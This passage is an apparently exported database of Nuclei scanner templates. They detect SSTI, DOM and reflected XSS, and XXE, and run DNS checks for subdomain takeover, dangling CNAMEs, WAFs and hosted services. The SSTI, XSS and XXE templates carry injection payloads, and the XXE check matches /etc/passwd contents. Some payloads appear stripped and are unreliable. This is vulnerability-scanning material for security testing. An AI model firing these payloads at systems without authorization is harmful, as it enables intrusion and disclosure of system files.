\"{{first}}*{{second}}\", \")\")}}'\n - '{{concat(\"{@\", \"{{first}}*{{second}}\", \"}\")}}'\n\n fuzzing:\n - part: query\n type: postfix\n fuzz:\n - \"{{ssti}}\"\n\n stop-at-first-match: true\n matchers:\n - type: word\n part: body\n words:\n - \"{{result}}\"\n# digest: 4a0a00473045022060b24ab805932a9aae5635d76725d92d78d3366f76b103480386f7db2231b750022100cf4e3feff8153a59a9b668bbe6c989c4940074ec6857c5f4f4f920660719143d:922c64590222798bb761d5b6d8e72950", "hash": "8dd625e878105966a28582ec8a08758b", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c8e" }, "name": "dom-xss.yaml", "content": "id: dom-xss\n\ninfo:\n name: DOM Cross Site Scripting\n author: theamanrawat\n severity: medium\n description: |\n Detects DOM-based Cross Site Scripting (XSS) vulnerabilities.\n impact: |\n Allows attackers to execute malicious scripts in the victim's browser.\n remediation: |\n Sanitize and validate user input to prevent script injection.\n tags: xss,dom,dast,headless\nvariables:\n num: \"{{rand_int(10000, 99999)}}\"\nheadless:\n - steps:\n - action: navigate\n args:\n url: \"{{BaseURL}}\"\n\n - action: waitload\n payloads:\n reflection:\n - \"'\\\">

{{num}}

\"\n\n fuzzing:\n - part: query\n type: postfix\n mode: single\n fuzz:\n - \"{{reflection}}\"\n\n stop-at-first-match: true\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"

{{num}}

\"\n\n - type: word\n part: header\n words:\n - \"text/html\"\n# digest: 490a0046304402207fab7c940fcf22142b9d67138f5ab9f0b23ff7990e1a3140a0e427d5040f331b02200c46ebbb04f1cc22da5644e29a7cf09905491c071ee8a80b2cd1070c6772827b:922c64590222798bb761d5b6d8e72950", "hash": "de3b1d462cd569fabfb84e5bf8e959ad", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c8f" }, "name": "reflected-xss.yaml", "content": "id: reflected-xss\n\ninfo:\n name: Reflected Cross Site Scripting\n author: pdteam\n severity: medium\n tags: xss,rxss,dast\n\nvariables:\n first: \"{{rand_int(10000, 99999)}}\"\n\nhttp:\n - pre-condition:\n - type: dsl\n dsl:\n - 'method == \"GET\"'\n\n payloads:\n reflection:\n - \"'\\\"><{{first}}\"\n\n fuzzing:\n - part: query\n type: postfix\n mode: single\n fuzz:\n - \"{{reflection}}\"\n\n stop-at-first-match: true\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"{{reflection}}\"\n\n - type: word\n part: header\n words:\n - \"text/html\"\n# digest: 4a0a0047304502205a9aa38841e7308e5d1bf21526d6ae14c3ea4b5b00def0f0f0b95501c0df237d022100ca9a3145f00b6278b60ccc0cb44b525a7bfcf2f86ead8664c33c0ce345a623ea:922c64590222798bb761d5b6d8e72950", "hash": "b884e62a19bff378ce7f66b0fe9c86ea", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c90" }, "name": "generic-xxe.yaml", "content": "id: generic-xxe\n\ninfo:\n name: Generic XML external entity (XXE)\n author: pwnhxl\n severity: medium\n reference:\n - https://github.com/andresriancho/w3af/blob/master/w3af/plugins/audit/xxe.py\n tags: dast,xxe\n\nvariables:\n rletter: \"{{rand_base(6,'abc')}}\"\n\nhttp:\n - pre-condition:\n - type: dsl\n dsl:\n - 'method == \"GET\"'\n\n payloads:\n xxe:\n - ' ]>&{{rletter}};'\n - ' ]>&{{rletter}};'\n\n fuzzing:\n - part: query\n keys-regex:\n - \"(.*?)xml(.*?)\"\n fuzz:\n - \"{{xxe}}\"\n\n - part: query\n values:\n - \"(\"\n fuzz:\n - \"{{xxe}}\"\n\n stop-at-first-match: true\n matchers-condition: or\n matchers:\n - type: regex\n name: linux\n part: body\n regex:\n - 'root:.*?:[0-9]*:[0-9]*:'\n\n - type: word\n name: windows\n part: body\n words:\n - 'for 16-bit app support'\n# digest: 490a00463044022057ed734a899a6e84282567122e7cbd55d596db47869a9f1079fdda8222765cdd02206129d4a12c906388ae43c37e4048a1913371fc637748eaaefc1356dbae82d139:922c64590222798bb761d5b6d8e72950", "hash": "bcdf8045538fb0ef1069cb60ac5900d8", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c91" }, "name": "azure-takeover-detection.yaml", "content": "id: azure-takeover-detection\n\ninfo:\n name: Microsoft Azure Takeover Detection\n author: pdteam\n severity: high\n description: Microsoft Azure is vulnerable to subdomain takeover attacks. Subdomain takeovers are a common, high-severity threat for organizations that regularly create and delete many resources. A subdomain takeover can occur when a DNS record points to a deprovisioned Azure resource.\n reference:\n - https://godiego.co/posts/STO/\n - https://docs.microsoft.com/en-us/azure/security/fundamentals/subdomain-takeover\n - https://cystack.net/research/subdomain-takeover-chapter-two-azure-services/\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N\n cvss-score: 7.2\n cwe-id: CWE-404\n metadata:\n max-request: 1\n tags: dns,takeover,azure\n\ndns:\n - name: \"{{FQDN}}\"\n type: A\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - \"azure-api.net\"\n - \"azure-mobile.net\"\n - \"azurecontainer.io\"\n - \"azurecr.io\"\n - \"azuredatalakestore.net\"\n - \"azureedge.net\"\n - \"azurefd.net\"\n - \"azurehdinsight.net\"\n - \"azurewebsites.net\"\n - \"azurewebsites.windows.net\"\n - \"blob.core.windows.net\"\n - \"cloudapp.azure.com\"\n - \"cloudapp.net\"\n - \"database.windows.net\"\n - \"redis.cache.windows.net\"\n - \"search.windows.net\"\n - \"servicebus.windows.net\"\n - \"trafficmanager.net\"\n - \"visualstudio.com\"\n\n - type: word\n words:\n - \"NXDOMAIN\"\n\n extractors:\n - type: dsl\n dsl:\n - cname\n\n# digest: 4a0a00473045022043d1113417de308936591aa35f8175c25ad9d5b66b6d076fe0ba324450b1799e022100add5bb113b494d920eb39a99c107f2e7dff1979d482302e2580ff07e5857d9ff:922c64590222798bb761d5b6d8e72950\n", "hash": "06433763a77ee0d9d28304b3187a1209", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c92" }, "name": "caa-fingerprint.yaml", "content": "id: caa-fingerprint\n\ninfo:\n name: CAA Record\n author: pdteam\n severity: info\n description: A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.\n reference:\n - https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record\n classification:\n cwe-id: CWE-200\n metadata:\n max-request: 1\n tags: dns,caa\n\ndns:\n - name: \"{{FQDN}}\"\n type: CAA\n matchers:\n - type: regex\n regex:\n - \"IN\\\\s+CAA\\\\s+(.+)\"\n\n extractors:\n - type: regex\n group: 1\n regex:\n - 'issue \"(.*)\"'\n - 'issuewild \"(.*)\"'\n - 'iodef \"(.*)\"'\n\n# digest: 4a0a00473045022023198a26073ed129fe588c545c89a003975219e7da0033744c267d99093324370221008a42dc42e882b45ff2f7ef81ffd916e41dab50a710deb2d0c7268bf9dec11e8f:922c64590222798bb761d5b6d8e72950\n", "hash": "2ebbf26635b0b2f4629b7e120f7ab7e8", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c93" }, "name": "detect-dangling-cname.yaml", "content": "id: detect-dangling-cname\n\ninfo:\n name: CNAME Detect Dangling\n author: pdteam,nytr0gen\n severity: info\n description: A CNAME detect dangling condition was discovered. Most commonly this relates to failing to remove records from the zone once they are no longer needed.\n reference:\n - https://securitytrails.com/blog/subdomain-takeover-tips\n - https://nominetcyber.com/dangling-dns-is-no-laughing-matter/\n - https://nabeelxy.medium.com/dangling-dns-records-are-a-real-vulnerability-361f2a29d37f\n - https://docs.microsoft.com/en-us/azure/security/fundamentals/subdomain-takeover\n classification:\n cwe-id: CWE-200\n metadata:\n max-request: 1\n tags: dns,takeover\n\ndns:\n - name: \"{{FQDN}}\"\n type: A\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - \"NXDOMAIN\"\n\n - type: regex\n part: answer\n regex:\n - \"IN\\tCNAME\\t(.+)$\"\n\n extractors:\n - type: dsl\n dsl:\n - cname\n\n# digest: 4a0a0047304502201b035521c9d0b1afe37b2bb5326afde1f0022e730b8dd87fa3d247daa558c8a4022100fe8ffe8dec0946abcb2cea2241ed5836041f0fb092417c2eb3ff9b2625ad4dac:922c64590222798bb761d5b6d8e72950\n", "hash": "b1b2919bd4948a014ec4ae0002387247", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c94" }, "name": "dmarc-detect.yaml", "content": "id: dmarc-detect\n\ninfo:\n name: DNS DMARC - Detect\n author: juliosmelo\n severity: info\n description: |\n DNS DMARC information was detected.\n reference:\n - https://dmarc.org/\n - https://dmarc.org/wiki/FAQ#Why_is_DMARC_important.3F\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N\n cvss-score: 0\n cwe-id: CWE-200\n metadata:\n max-request: 1\n tags: dns,dmarc\n\ndns:\n - name: \"_dmarc.{{FQDN}}\"\n type: TXT\n matchers:\n - type: regex\n part: answer\n regex:\n - \"IN\\tTXT\\\\t(.+)$\"\n\n extractors:\n - type: regex\n group: 1\n regex:\n - \"IN\\tTXT\\t(.+)\"\n\n# digest: 4a0a0047304502204076c7a56a64102033ddcbffe604e0099b21d4e3fc93681f25db84b6c9ea0d49022100cc84a29967d71f3d07b107990f34ec5d804757336391661727adf79dc07eef3d:922c64590222798bb761d5b6d8e72950\n", "hash": "7eab67baf60eba1c5ca089f342062c6e", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c95" }, "name": "dns-rebinding.yaml", "content": "id: dns-rebinding\ninfo:\n name: DNS Rebinding Attack\n author: ricardomaia\n severity: unknown\n description: |\n Detects DNS Rebinding attacks by checking if the DNS response contains a private IPv4 or IPv6 address.\n reference:\n - https://capec.mitre.org/data/definitions/275.html\n - https://payatu.com/blog/dns-rebinding/\n - https://heimdalsecurity.com/blog/dns-rebinding/\n metadata:\n max-request: 2\n tags: redirect,dns,network\n\ndns:\n - name: \"{{FQDN}}\"\n type: A\n matchers:\n # IPv4\n - type: regex\n part: answer\n regex:\n - 'IN\\s+A\\s+(127\\.0\\.0\\.1|10\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}|172\\.(1[6-9]|2\\d|3[0-1])\\.\\d{1,3}\\.\\d{1,3}|192\\.168\\.\\d{1,3}\\.\\d{1,3})$'\n\n extractors:\n - type: regex\n part: answer\n name: IPv4\n group: 1\n regex:\n - 'IN\\s+A\\s+(127\\.0\\.0\\.1|10\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}|172\\.(1[6-9]|2\\d|3[0-1])\\.\\d{1,3}\\.\\d{1,3}|192\\.168\\.\\d{1,3}\\.\\d{1,3})'\n\n - name: \"{{FQDN}}\"\n type: AAAA\n matchers:\n # IPv6 Compressed and Full\n - type: regex\n part: answer\n regex:\n - \"IN\\\\s+AAAA\\\\s+(fd[0-9a-fA-F]{2}(:[0-9a-fA-F]{0,4}){0,7})\"\n\n extractors:\n - type: regex\n part: answer\n name: IPv6_ULA\n group: 1\n regex:\n - \"IN\\\\s+AAAA\\\\s+(fd[0-9a-fA-F]{2}(:[0-9a-fA-F]{0,4}){0,7})\"\n# digest: 4b0a00483046022100f31fd9369022bcafe6da846b246069391f1c22137b8024bb71905634ffa56673022100ea3679256b9518c8853b42432e216d4da6ff3e88ebee349b67e8e8ba7d8a13e1:922c64590222798bb761d5b6d8e72950", "hash": "f99c962d1b19997f0b0e44d070697097", "level": 1, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c96" }, "name": "dns-saas-service-detection.yaml", "content": "id: dns-saas-service-detection\n\ninfo:\n name: DNS SaaS Service Detection\n author: noah @thesubtlety,pdteam\n severity: info\n description: A CNAME DNS record was discovered\n reference:\n - https://ns1.com/resources/cname\n - https://www.theregister.com/2021/02/24/dns_cname_tracking/\n - https://www.ionos.com/digitalguide/hosting/technical-matters/cname-record/\n metadata:\n max-request: 1\n tags: dns,service\n\ndns:\n - name: \"{{FQDN}}\"\n type: CNAME\n\n extractors:\n - type: dsl\n dsl:\n - cname\n\n matchers-condition: or\n matchers:\n - type: word\n part: answer\n name: ms-office\n words:\n - outlook.com\n - office.com\n\n - type: word\n part: answer\n name: azure\n words:\n - \"azure-api.net\"\n - \"azure.com\"\n - \"azure-mobile.net\"\n - \"azurecontainer.io\"\n - \"azurecr.io\"\n - \"azuredatalakestore.net\"\n - \"azureedge.net\"\n - \"azurefd.net\"\n - \"azurehdinsight.net\"\n - \"azurewebsites.net\"\n - \"azurewebsites.windows.net\"\n - \"blob.core.windows.net\"\n - \"cloudapp.azure.com\"\n - \"cloudapp.net\"\n - \"database.windows.net\"\n - \"redis.cache.windows.net\"\n - \"search.windows.net\"\n - \"servicebus.windows.net\"\n - \"visualstudio.com\"\n - \"-msedge.net\"\n - \"msappproxy.net\"\n - \"trafficmanager.net\"\n\n - type: word\n part: answer\n name: zendesk\n words:\n - \"zendesk.com\"\n\n - type: word\n part: answer\n name: announcekit\n words:\n - \"cname.announcekit.app\"\n\n - type: word\n part: answer\n name: wix\n words:\n - \"wixdns.net\"\n\n - type: word\n part: answer\n name: akamai-cdn\n words:\n - akadns.net\n - akagtm.org\n - akahost.net\n - akam.net\n - akamai.com\n - akamai.net\n - akamaiedge-staging.net\n - akamaiedge.net\n - akamaientrypoint.net\n - akamaihd.net\n - akamaistream.net\n - akamaitech.net\n - akamaitechnologies.com\n - akamaitechnologies.fr\n - akamaized.net\n - akaquill.net\n - akasecure.net\n - akasripcn.net\n - edgekey.net\n - edgesuite.net\n\n - type: word\n part: answer\n name: cloudflare-cdn\n words:\n - cloudflare.net\n - cloudflare-dm-cmpimg.com\n - cloudflare-ipfs.com\n - cloudflare-quic.com\n - cloudflare-terms-of-service-abuse.com\n - cloudflare.com\n - cloudflare.net\n - cloudflare.tv\n - cloudflareaccess.com\n - cloudflareclient.com\n - cloudflareinsights.com\n - cloudflareok.com\n - cloudflareportal.com\n - cloudflareresolve.com\n - cloudflaressl.com\n - cloudflarestatus.com\n - sn-cloudflare.com\n\n - type: word\n part: answer\n name: amazon-cloudfront\n words:\n - cloudfront.net\n\n - type: word\n part: answer\n name: salesforce\n words:\n - salesforce.com\n - siteforce.com\n - force.com\n\n - type: word\n part: answer\n name: amazon-aws\n words:\n - amazonaws.com\n - elasticbeanstalk.com\n - awsglobalaccelerator.com\n\n - type: word\n part: answer\n name: fastly-cdn\n words:\n - fastly.net\n\n - type: word\n part: answer\n name: netlify\n words:\n - netlify.app\n - netlify.com\n - netlifyglobalcdn.com\n\n - type: word\n part: answer\n name: vercel\n words:\n - vercel.app\n\n - type: word\n part: answer\n name: sendgrid\n words:\n - sendgrid.net\n - sendgrid.com\n\n - type: word\n part: answer\n name: qualtrics\n words:\n - qualtrics.com\n\n - type: word\n part: answer\n name: heroku\n words:\n - herokuapp.com\n - herokucdn.com\n - herokudns.com\n - herokussl.com\n - herokuspace.com\n\n - type: word\n part: answer\n name: gitlab\n words:\n - gitlab.com\n - gitlab.io\n\n - type: word\n part: answer\n name: perforce-akana\n words:\n - akana.com\n - apiportal.akana.com\n\n - type: word\n part: answer\n name: skilljar\n words:\n - skilljarapp.com\n\n - type: word\n part: answer\n name: datagrail\n words:\n - datagrail.io\n\n - type: word\n part: answer\n name: platform.sh\n words:\n - platform.sh\n\n - type: word\n part: answer\n name: folloze\n words:\n - folloze.com\n\n - type: word\n part: answer\n name: pendo-receptive\n words:\n - receptive.io\n - pendo.io\n\n - type: word\n part: answer\n name: discourse\n words:\n - bydiscourse.com\n - discourse-cdn.com\n - discourse.cloud\n - discourse.org\n - hosted-by-discourse.com\n\n - type: word\n part: answer\n name: adobe-marketo\n words:\n - marketo.com\n - marketo.co.uk\n - mktoweb.com\n - mktossl.com\n - mktoweb.com\n\n - type: word\n part: answer\n name: adobe-marketo - 'mkto-.{5,8}\\.com'\n\n - type: word\n part: answer\n name: adobe-marketo\n words:\n - marketo.com\n\n - type: word\n part: answer\n name: rock-content\n words:\n - postclickmarketing.com\n - rockcontent.com\n - rockstage.io\n\n - type: word\n part: answer\n name: rocketlane\n words:\n - rocketlane.com\n\n - type: word\n part: answer\n name: webflow\n words:\n - proxy-ssl.webflow.com\n\n - type: word\n part: answer\n name: stacker-hq\n words:\n - stacker.app\n\n - type: word\n part: answer\n name: hubspot\n words:\n - hs-analytics.net\n - hs-banner.com\n - hs-scripts.com\n - hsappstatic.net\n - hscollectedforms.net\n - hscoscdn00.net\n - hscoscdn10.net\n - hscoscdn20.net\n - hscoscdn30.net\n - hscoscdn40.net\n - hsforms.com\n - hsforms.net\n - hubapi.com\n - hubspot.com\n - hubspot.es\n - hubspot.net\n - hubspotemail.net\n - hubspotlinks.com\n - hubspotusercontent-na1.net\n - sidekickopen90.com\n - usemessages.com\n\n - type: word\n part: answer\n name: gitbook\n words:\n - gitbook.com\n - gitbook.io\n\n - type: word\n part: answer\n name: google-firebase\n words:\n - fcm.googleapis.com\n - firebase.com\n - firebase.google.com\n - firebase.googleapis.com\n - firebaseapp.com\n - firebaseappcheck.googleapis.com\n - firebasedynamiclinks-ipv4.googleapis.com\n - firebasedynamiclinks-ipv6.googleapis.com\n - firebasedynamiclinks.googleapis.com\n - firebaseinappmessaging.googleapis.com\n - firebaseinstallations.googleapis.com\n - firebaseio.com\n - firebaselogging-pa.googleapis.com\n - firebaselogging.googleapis.com\n - firebaseperusertopics-pa.googleapis.com\n - firebaseremoteconfig.googleapis.com\n\n - type: word\n part: answer\n name: zendesk\n words:\n - zdassets.com\n - zdorigin.com\n - \"zendesk.com\"\n - zopim.com\n\n - type: word\n part: answer\n name: imperva\n words:\n - incapdns.net\n - incapsula.com\n\n - type: word\n part: answer\n name: proofpoint\n words:\n - infoprtct.com\n - metanetworks.com\n - ppe-hosted.com\n - pphosted.com\n - proofpoint.com\n\n - type: word\n part: answer\n name: q4-investor-relations\n words:\n - q4inc.com\n - q4ir.com\n - q4web.com\n\n - type: word\n part: answer\n name: google-hosted\n words:\n - appspot.com\n - cloudfunctions.net\n - ghs.googlehosted.com\n - ghs4.googlehosted.com\n - ghs46.googlehosted.com\n - ghs6.googlehosted.com\n - googlehosted.com\n - googlehosted.l.googleusercontent.com\n - run.app\n\n - type: word\n part: answer\n name: wp-engine\n words:\n - wpengine.com\n\n - type: word\n part: answer\n name: github\n words:\n - github.com\n - github.io\n - githubusercontent.com\n\n - type: word\n part: answer\n name: ghost\n words:\n - ghost.io\n\n - type: word\n part: answer\n name: digital-ocean\n words:\n - ondigitalocean.app\n\n - type: word\n part: answer\n name: typedream\n words:\n - ontypedream.com\n\n - type: word\n part: answer\n name: oracle-eloqua-marketing\n words:\n - hs.eloqua.com\n\n - type: regex\n part: answer\n regex:\n - \"IN\\tCNAME\\\\t(.+)$\"\n - \"IN\\\\s*CNAME\\\\t(.+)$\"\n# digest: 490a0046304402205694ac1cba58232ec715831e94086da7081a9b756f86016358b1347a1a340787022040615d63a66787d706d2be8b3f13cead87f7278c471091a7783bfab4e4fa2aef:922c64590222798bb761d5b6d8e72950", "hash": "48b8a3876b80d7e72554ae1dffa3f29a", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c97" }, "name": "dns-waf-detect.yaml", "content": "id: dns-waf-detect\n\ninfo:\n name: DNS WAF Detection\n author: lu4nx\n severity: info\n description: A DNS WAF was detected.\n classification:\n cwe-id: CWE-200\n metadata:\n max-request: 2\n tags: tech,waf,dns\n\ndns:\n - name: \"{{FQDN}}\"\n type: CNAME\n\n - name: \"{{FQDN}}\"\n type: NS\n matchers:\n - type: word\n part: answer\n name: sanfor-shield\n words:\n - \".sangfordns.com\"\n\n - type: word\n part: answer\n name: 360panyun\n words:\n - \".360panyun.com\"\n\n - type: word\n part: answer\n name: baiduyun\n words:\n - \".yunjiasu-cdn.net\"\n\n - type: word\n part: answer\n name: chuangyudun\n words:\n - \".365cyd.cn\"\n - \".cyudun.net\"\n\n - type: word\n part: answer\n name: knownsec\n words:\n - \".jiashule.com\"\n - \".jiasule.org\"\n\n - type: word\n part: answer\n name: huaweicloud\n words:\n - \".huaweicloudwaf.com\"\n\n - type: word\n part: answer\n name: xinliuyun\n words:\n - \".ngaagslb.cn\"\n\n - type: word\n part: answer\n name: chinacache\n words:\n - \".chinacache.net\"\n - \".ccgslb.net\"\n\n - type: word\n part: answer\n name: nscloudwaf\n words:\n - \".nscloudwaf.com\"\n\n - type: word\n part: answer\n name: wangsu\n words:\n - \".wsssec.com\"\n - \".lxdns.com\"\n - \".wscdns.com\"\n - \".cdn20.com\"\n - \".cdn30.com\"\n - \".ourplat.net\"\n - \".wsdvs.com\"\n - \".wsglb0.com\"\n - \".wswebcdn.com\"\n - \".wswebpic.com\"\n - \".wsssec.com\"\n - \".wscloudcdn.com\"\n - \".mwcloudcdn.com\"\n\n - type: word\n part: answer\n name: qianxin\n words:\n - \".360safedns.com\"\n - \".360cloudwaf.com\"\n\n - type: word\n part: answer\n name: baiduyunjiasu\n words:\n - \".yunjiasu-cdn.net\"\n\n - type: word\n part: answer\n name: anquanbao\n words:\n - \".anquanbao.net\"\n\n - type: regex\n name: aliyun\n regex:\n - '\\.w\\.kunlun\\w{2,3}\\.com'\n\n - type: regex\n name: aliyun-waf\n regex:\n - '\\.aliyunddos\\d+\\.com'\n - '\\.aliyunwaf\\.com'\n - '\\.aligaofang\\.com'\n - '\\.aliyundunwaf\\.com'\n\n - type: word\n part: answer\n name: xuanwudun\n words:\n - \".saaswaf.com\"\n - \".dbappwaf.cn\"\n\n - type: word\n part: answer\n name: yundun\n words:\n - \".hwwsdns.cn\"\n - \".yunduncname.com\"\n\n - type: word\n part: answer\n name: knownsec-ns\n words:\n - \".jiasule.net\"\n\n - type: word\n part: answer\n name: chuangyudun\n words:\n - \".365cyd.net\"\n\n - type: word\n part: answer\n name: qianxin\n words:\n - \".360wzb.com\"\n\n - type: word\n part: answer\n name: anquanbao\n words:\n - \".anquanbao.com\"\n\n - type: word\n part: answer\n name: wangsu\n words:\n - \".chinanetcenter.com\"\n\n - type: word\n part: answer\n name: baiduyunjiasue\n words:\n - \".ns.yunjiasu.com\"\n\n - type: word\n part: answer\n name: chinacache\n words:\n - \".chinacache.com\"\n\n - type: word\n part: answer\n name: cloudflare\n words:\n - \"ns.cloudflare.com\"\n\n - type: word\n part: answer\n name: edns\n words:\n - \".iidns.com\"\n\n# digest: 4a0a0047304502200a845666375d02a84b9b0a1b56465d375357774b8c0c3a044dccf1e02fbf6267022100bf5e4f34f8e41d1cf13880ed6760c273df09e408a6d0c53c335dceeadac76182:922c64590222798bb761d5b6d8e72950\n", "hash": "90390f20617a8a33b413c75bc8c03b82", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c98" }, "name": "dnssec-detection.yaml", "content": "id: dnssec-detection\n\ninfo:\n name: DNSSEC Detection\n author: pdteam\n severity: info\n description: Domain Name System Security Extensions (DNSSEC) are enabled. The Delegation of Signing (DS) record provides information about a signed zone file when DNSSEC enabled.\n reference:\n - https://www.icann.org/resources/pages/dnssec-what-is-it-why-important-2019-03-05-en\n - https://www.cyberciti.biz/faq/unix-linux-test-and-validate-dnssec-using-dig-command-line/\n classification:\n cwe-id: CWE-200\n metadata:\n max-request: 1\n tags: dns,dnssec\n\ndns:\n - name: \"{{FQDN}}\"\n type: DS\n matchers:\n - type: regex\n part: answer\n regex:\n - \"IN\\tDS\\\\t(.+)$\"\n\n# digest: 4b0a00483046022100dd7c45e1b16ab7caba75d6b28a27e3678896daad8cc2413e3f9120efa8be540202210095b8145af0ff47b2c140dc6f9f643f058bb31768759be99af4098f2cbd0d1997:922c64590222798bb761d5b6d8e72950\n", "hash": "fb21ecfdcc25da00665a2b134e1e9ce6", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c99" }, "name": "ec2-detection.yaml", "content": "id: ec2-detection\n\ninfo:\n name: AWS EC2 Detection\n author: melbadry9\n severity: info\n description: Amazon Elastic Compute Cloud (EC2) detected.\n reference:\n - https://blog.melbadry9.xyz/dangling-dns/aws/ddns-ec2-current-state\n classification:\n cwe-id: CWE-200\n metadata:\n max-request: 1\n tags: dns,ec2,aws\n\ndns:\n - name: \"{{FQDN}}\"\n type: CNAME\n\n extractors:\n - type: regex\n regex:\n - \"ec2-[-\\\\d]+\\\\.compute[-\\\\d]*\\\\.amazonaws\\\\.com\"\n - \"ec2-[-\\\\d]+\\\\.[\\\\w\\\\d\\\\-]+\\\\.compute[-\\\\d]*\\\\.amazonaws\\\\.com\"\n\n# digest: 4a0a00473045022100995379438eef7d1b9435317e2326c27b32ff7c257437185c9bf505dc30d972e002202882175b25ec22258156a75b31ed020bfcdc29ababcd9e052ce591ab2acb3ff8:922c64590222798bb761d5b6d8e72950\n", "hash": "5cccc5c5cffdd05dab983a1c5cc3838e", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c9a" }, "name": "elasticbeanstalk-takeover.yaml", "content": "id: elasticbeanstalk-takeover\n\ninfo:\n name: ElasticBeanstalk Subdomain Takeover Detection\n author: philippedelteil,rotemreiss,zy9ard3,joaonevess\n severity: high\n description: ElasticBeanstalk subdomain takeover detected. A subdomain takeover occurs when an attacker gains control over a subdomain of a target domain. Typically, this happens when the subdomain has a canonical name (CNAME) in the Domain Name System (DNS), but no host is providing content for it.\n reference:\n - https://github.com/EdOverflow/can-i-take-over-xyz/issues/147\n - https://twitter.com/payloadartist/status/1362035009863880711\n - https://www.youtube.com/watch?v=srKIqhj_ki8\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N\n cvss-score: 7.2\n cwe-id: CWE-404\n metadata:\n max-request: 1\n comments: |\n Only CNAMEs with region specification are hijackable.\n You need to claim the CNAME in AWS portal (https://aws.amazon.com/) or via AWS CLI to confirm the takeover.\n Do not report this without claiming the CNAME.\n CLI command to verify the availability of the environment:\n aws elasticbeanstalk check-dns-availability --region {AWS_REGION} --cname-prefix {CNAME_PREFIX}\n For example:\n CNAME - 2rs3c.eu-west-1.elasticbeanstalk.com\n Command - aws elasticbeanstalk check-dns-availability --region eu-west-1 --cname-prefix 2rs3c\n tags: dns,takeover,aws,elasticbeanstalk\n\ndns:\n - name: \"{{FQDN}}\"\n type: A\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - CNAME\\t[a-z0-9_-]*\\.(us|af|ap|ca|eu|me|sa|il)\\-(north|east|west|south|northeast|southeast|central)\\-[1-9]+\\.elasticbeanstalk\\.com\n\n - type: word\n words:\n - NXDOMAIN\n\n extractors:\n - type: dsl\n dsl:\n - cname\n# digest: 4a0a00473045022050760ee5a49ba66950d709ad082c96f1f8cf59151573984107709cf7d108288b022100dddbce009750e8fb8c2018ff0937efe3be734a09791f0eb5715ea73b2593b0e2:922c64590222798bb761d5b6d8e72950", "hash": "55e337d1b529f49a2a12c064cb9b93a5", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c9b" }, "name": "mx-fingerprint.yaml", "content": "id: mx-fingerprint\n\ninfo:\n name: MX Record Detection\n author: pdteam\n severity: info\n description: An MX record was detected. MX records direct emails to a mail exchange server.\n reference:\n - https://www.cloudflare.com/learning/dns/dns-records/dns-mx-record/\n - https://mxtoolbox.com/\n classification:\n cwe-id: CWE-200\n metadata:\n max-request: 1\n tags: dns,mx\n\ndns:\n - name: \"{{FQDN}}\"\n type: MX\n matchers:\n - type: regex\n part: answer\n regex:\n - \"IN\\tMX\\\\t(.+)$\"\n\n extractors:\n - type: regex\n group: 1\n regex:\n - \"IN\\tMX\\t(.+)\"\n\n# digest: 4a0a0047304502205efe2d8fc4f39144631e42eaf8d4e45773974e43ff3d2db923203db6e044be4d022100c3fb0ba12d80ceff4ea27c45f1a3380ff6727b8a747803d3899a255fb2672f0f:922c64590222798bb761d5b6d8e72950\n", "hash": "3966d3e1a99da946dd6e158b2b3e73e6", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c9c" }, "name": "mx-service-detector.yaml", "content": "id: mx-service-detector\n\ninfo:\n name: Email Service Detector\n author: binaryfigments\n severity: info\n description: An email service was detected. Check the email service or spam filter that is used for a domain.\n classification:\n cwe-id: CWE-200\n metadata:\n max-request: 1\n tags: dns,service\n\ndns:\n - name: \"{{FQDN}}\"\n type: MX\n\n matchers-condition: or\n matchers:\n - type: word\n name: \"Office 365\"\n words:\n - \"mail.protection.outlook.com\"\n\n - type: word\n name: \"Google Apps\"\n words:\n - \"aspmx2.googlemail.com\"\n - \"aspmx3.googlemail.com\"\n - \"alt1.aspmx.l.google.com\"\n - \"alt2.aspmx.l.google.com\"\n - \"aspmx.l.google.com\"\n\n - type: word\n name: \"ProtonMail\"\n words:\n - \"mail.protonmail.ch\"\n - \"mailsec.protonmail.ch\"\n\n - type: word\n name: \"Zoho Mail\"\n words:\n - \"mx.zoho.eu\"\n - \"mx2.zoho.eu\"\n - \"mx3.zoho.eu\"\n\n - type: word\n name: \"ForcePoint Email Security\"\n words:\n - \"in.mailcontrol.com\"\n\n - type: word\n name: \"E-Zorg NL\"\n words:\n - \"spamfilter02.ezorg.nl\"\n - \"spamfilter01.ezorg.nl\"\n - \"spamfilter.ezorg.nl\"\n - \"spamfilter03.ezorg.nl\"\n\n - type: word\n name: 